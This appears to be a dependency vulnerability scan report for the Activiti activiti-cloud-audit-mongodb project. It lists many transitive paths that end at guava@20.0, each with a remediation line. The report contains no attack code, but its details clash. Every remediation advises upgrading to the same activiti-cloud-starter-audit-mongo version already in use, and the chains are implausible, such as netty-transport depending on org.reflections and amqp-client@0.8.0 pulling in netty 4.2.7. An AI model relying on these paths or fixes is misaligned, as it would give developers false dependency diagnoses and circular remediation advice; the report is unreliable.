Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
